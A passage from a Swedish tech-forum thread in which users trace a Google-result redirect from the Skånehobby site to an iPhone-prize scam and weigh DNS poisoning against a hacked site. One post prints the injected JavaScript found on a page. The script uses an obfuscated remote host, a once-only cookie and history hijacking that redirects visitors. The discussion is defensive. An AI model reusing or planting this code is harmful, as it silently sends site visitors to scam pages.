Försöker förstå hur detta gick till (redirect/scam)

Permalänk
Medlem

Försöker förstå hur detta gick till (redirect/scam)

Hoppas jag lagt detta i rätt forumdel, anyway...

Skulle in på Skånehobbys hemsida, knappade in "Skånehobby" i adressfältet i Firefox, vilket resultera i en google sökningen där första resultatet är en länk till Skånehobbys hemsida. Givetvis klickade jag där.

Nu till det lite illavarslande, jag kom till en iPhone scam. Mer exakt, här är var jag hamnade (OBS Länken kan utgöra en säkerhetsrisk, så klicka inte!):
*Länk borttagen*

Givetvis råddar jag lite i det här. Det intressanta är att om jag nu kollar så går länken i googles sökresultat till:
https://www.google.se/url?sa=t&rct=j&q=&esrc=s&source=web&cd=...
Detta tror jag är nån form av google tracking/redirect länk till https://www.skanehobby.se/, så det verkar ok (lite märkligt att när man hovrar över länken i FF så ser det ut att vara en direktlänk till Skånehobby).

En annan intressant grej är att andra gången jag gick in på sidan så visade den en bakgrunds-sida som försökte påskina att jag hamnat hos min bredbandsleverantör och sen en popup ovanpå som påstod att det var en tävling hos leverantören (första gången var det nog blank bakgrund). Om jag försöker komma in på sidan nu så hittas inte webbplatsen.

Jag har kört en full scan på min laptop här och det fanns inget som Avira reagerade på och jag kan inte längre få fram scam:en. Det jag försöker utröna är dels om jag har nåt skit i systemet (dator/nätverk) härhemma och dels hur detta gick till.

Visa signatur

"I have a hammer! I can put things together! I can knock things apart! I can alter my environment at will and make an incredible din all the while! Ah, it’s great to be male!"

Permalänk
Medlem

Intressant, råkat ut för liknande, och konstaterat att problemet inte legat på min sida, utan snarare förmodligen ett fall av dns-förgiftning hos min isp (comhem).

Eftersom det inte hänt igen på över ett halvår nu så utesluter jag även att min router skulle vara problemet.

URL:en till reklamsidan är liknande den jag råkade ut för också.

Vore väldigt intressant att höra om någon annan har råkat ut för samma, och kanske har en bra förklaring på detta fenomen.

De översta träffarna på google brukar oftast vara sponsrade, och då står det angivet. Därav tracking-länk.

Permalänk
Medlem

Låter helt klart som suspekt otyg som påverkar DNS. Möjligen via IPS som talare ovan föreslår (mycket ovanligt), via router (ganska ovanligt) eller via datorn (vanligt). Har du provat att även skanna med t.ex. Malwarebytes och adware removal tool? Jag skulle börja i den änden och se om det ger något napp

Permalänk
Medlem

Gör jag en sökning på Skånehobby på Google (med Chrome) och tar första alternativet som kommer upp i resultaten kommer jag till samma scam-adress. Har enligt Malwarebytes en virusfri dator. Min ISP är Telia.

Visa signatur

Ursprungligen inskrivet av Galna_Dvärgen ... i begynnelsen skapade inet fri frakt för sweclockersmedlemmar och såg att det var gott.

Permalänk
Medlem

För mig funkar första resultatet (deras riktiga url) som den ska.

Har ni båda telia som isp tro? För om så är fallet är det ju nästan bergis telias dns-servrar som är problemet.

Permalänk
Medlem

Min ISP är Teleservice i Sjöbo

Visa signatur

"I have a hammer! I can put things together! I can knock things apart! I can alter my environment at will and make an incredible din all the while! Ah, it’s great to be male!"

Permalänk
Medlem

@1mike20: Tack, då kan jag troligtvis utesluta skit i min burk

Visa signatur

"I have a hammer! I can put things together! I can knock things apart! I can alter my environment at will and make an incredible din all the while! Ah, it’s great to be male!"

Permalänk
Medlem

Jag får upp rätt sida, jag använder googles DNSer

Visa signatur

"One is always considered mad, when one discovers something that others cannot grasp."
- Ed Wood

Permalänk
Medlem

Testade jag också med Googles DNSer och då fungerar länkningen som det ska!

Visa signatur

Ursprungligen inskrivet av Galna_Dvärgen ... i begynnelsen skapade inet fri frakt för sweclockersmedlemmar och såg att det var gott.

Permalänk

Spännande jag fick också upp en Iphone-scam-sida.

Jag har Bahnhof som operatör men DNS från OpenDNS tydligen (tror det är en gammal inställning som var konfigurerad i routern från när jag hade Telia tidigare) - den kanske inte är pålitlig längre?

Permalänk
Medlem

Testade också, och fick upp samma scam, dock bara första gången, efterföljande klick på länk gick till rätt, testa att emellan rensa kakor men gick fortfarande till rätt.

Lite skumt detta, det kan vara skånehobby som har fått in nån skum kod på sin webbsida som ställer till det, inte helt ovanligt att det sker.

Visa signatur

Acer Predator Helios 300

Permalänk
Medlem
Skrivet av 1mike20:

Testade jag också med Googles DNSer och då fungerar länkningen som det ska!

Tror inte det att man kan dra nån slutsats av det, du har ju redan råkat ut för fenomenet en gång.

Jag omdirigerades till den sidan endast en gång och scam-länken funkade bara en kort stund (dvs när jag försöker gå till den direkt). Jag kan inte repetera fenomenet här oavsett vilken DNS jag använder.

Visa signatur

"I have a hammer! I can put things together! I can knock things apart! I can alter my environment at will and make an incredible din all the while! Ah, it’s great to be male!"

Permalänk
Avstängd

Jag har också fått upp det där med en undersökning från ens internetleverantör några gånger först för typ ett år sedan och senast kanske för några månader sedan. Första gången sökte jag igenom datorn med några olika verktyg utan att hitta något och sen sket jag bara i det och stängde fönstret. Har Bahnhof.

Angående googles redirect så är det standard för google och det är väl så de håller reda på vilka länkar som klickas på och så.

Permalänk
Medlem

När jag klickade på TS länk fick jag en iphone-tävling första gången och försökte jag igen kom jag till skånehobby.

Jag har Alltele och har också nyligen fått upp något i stil med "Här kan du delta i en kundundersökning från Alltele och få 500 kr", detta i ett relativt osuspekt surfsammanhang.

Har även blivit omdirigerad till något iphone-tävlingsliknande från vanliga google-resultat som bara pekar på en domän (alltså i stil med "http://www.*******.se")

Detta skedde bara en gång (iaf per sida), när jag försökte återskapa problemet kom jag gång på gång in på rätt sida som vanligt.

Första gången såg jag att URL:en innehöll något i stil med "http://rage1197.download*************************"-någonting. Googlar man på det får man fram sådana där luriga "så här tar du bort rage1197-virus, ladda hem det här remove-programmet" etc. Så eventuellt rör det sig om något halvkänt iaf?

Har ingen speciell DNS konfigurerad i datorn och routern får DNS från ISP (Alltele). Möjligtvis att ena datorn använder 8.8.8.8

Permalänk

Kan vara så att någon lyckats skjuta in skadlig kod på deras hemsida, dvs att man blir vidarebefordrad till en annan sida. Beroende på hur dom har valt att det ska fungera, så kan det vara slumpat. För att inte dra till sig för mycket uppmärksamhet.

Nu hade dom ingen reklam från 3:e part, men det brukar vara en säker källa för fuffens annars. Det var poppis på facebook ett tag, att smyga med kod inuti bilder.

Permalänk
Medlem
Skrivet av MindBlaster_303:

Kan vara så att någon lyckats skjuta in skadlig kod på deras hemsida, dvs att man blir vidarebefordrad till en annan sida. Beroende på hur dom har valt att det ska fungera, så kan det vara slumpat. För att inte dra till sig för mycket uppmärksamhet.

Nu hade dom ingen reklam från 3:e part, men det brukar vara en säker källa för fuffens annars. Det var poppis på facebook ett tag, att smyga med kod inuti bilder.

I mitt fall kan du nog ha rätt, kollar man i källan på en av sidorna jag besökt så ser man detta efter body-taggen:

<script type="text/javascript"> var a=document.cookie.match("(^|;) ?fcked=([^;]*)(;|$)");if(1!=(a?unescape(a[2]):null)){var b=new Date; b.setTime(b.getTime()+864E5);document.cookie="fcked=1; expires="+b.toGMTString()+"; path=/"; var c=document.createElement("script"); c.async=!0;c.src="htt"+"p://pp"+"c.n"+"et"+"ne"+"t4"+"4.n"+"et"+":1"+"08"+"0/"+Math.floor(9999*Math.random())+".js?"+Math.floor(99*Math.random()); (document.getElementsByTagName("body")[0]||document.getElementsByTagName("head")[0]).appendChild(c)}; (function(){var a;try{for(a=0;10>a;++a)history.pushState({},"",""); onpopstate=function(a){a.state&&location.replace("ht"+"tp://p"+"pc.ne"+"tnet4"+"4.ne"+"t:1"+"08"+"0/50"+"8.html")}}catch(b){}})();</script>

(har försökt radbryta lite för att öka tydligheten)

Nu är jag ingen javascript-expert, men att dela upp en URL enligt "htt"+"p://pp"+"c.n"+"et" etc ser ju ut som ett uppenbart försök att dölja något. Dessutom är ju location.replace() hyfsat misstänkt

Det vore ju skönt om det "bara" berodde sidan och inte något skräp på datorn, vilket de där redirectsen säkert kan få till i förlängningen :S

fixade lite
Permalänk
Medlem

Tjejen fick också en rederect till en sida med en kundundersökning. De hävdade vara från vår ISP, alltele.
Detta var när hon skulle in på Swedbank..
Det känns inte som att de skulle ha skadlig kod på sidan, I alla fall inte speciellt länge utan upptäckt?

Har hänt en gång och en gång endast..

Skickades från m.sweclockers.com

Visa signatur

Hemmabio - LG C7 55", nVidia Shield TV 2017, Onkyo TX-NR656, Dynavoice DF-5, Dynavoice DX-5, Dynavoice DC-5
Server - Dell T20 /w E3-1225v3, 1050 TI 4GB, 24GB RAM, 30TB HDD /w parity + 628GB SSD
Bärbart Retina Macbook Pro 13" Early 2015 [i5, 512GB],Sony Xperia 5 II , MediaPad 5 10,8"

Permalänk
Medlem

Jag är fortfarande ganska hundra på att detta handlar om dns-spoofing/dns cache-förgiftning eller något åt det hållet. Tror inte att berörda sidor skulle vara påverkade (men kan givetvis ha fel), och det verkar inte heller som att berörda användare har något skit på sina burkar.

Permalänk
Medlem

Rensar man ut ur url:en

"htt"+"p://pp"+"c.n"+"et"+"ne"+"t4"+"4.n"+"et"+":1"+"08"+"0/"+Math.floor(9999*Math.random())+".js?"+Math.floor(99*Math.random())

Så får man ppc.net44.net:1080/. Så det går nog att blockera. Syns att det är javascript som kommer därifrån.

Visa signatur

/DragonII

Permalänk
Medlem

@DragonII: Jag fick strängen till "ppc.netnet44.net:1080"
Fast det kanske fanns nåt annat i koden som plockade bort det "net" som jag missade?

Visa signatur

"I have a hammer! I can put things together! I can knock things apart! I can alter my environment at will and make an incredible din all the while! Ah, it’s great to be male!"

Permalänk

Lite klurigt att lista ut varifrån det kommer (lokalt eller på extern på servern). Men får du upp samma sida om du besöker andra sidor, så kan det vara nånting i datorn som skjuter in kod. Kanske ett add-in till webbläsaren. Fanns nått plugin till Chrome som blev uppköpt och dom nya ägarna gjorde det dom var bäst på. Det vill säga att sänka den grunden med en massa malware och kod som blev påklistrat på sidor.

Det var ett par år sedan visserligen. Men inget säger att det kan hända igen. Kommer inte tusan ihåg vilket plugin det var, men kan ha varit nån variant utav AdBlocker.

Men i detta fall, så tror jag mer på att webbservern är drabbad. Har du antivirus och kanske malwarebytes på datorn så skadar det inte att köra en fullständig sökning. Better safe than sorry!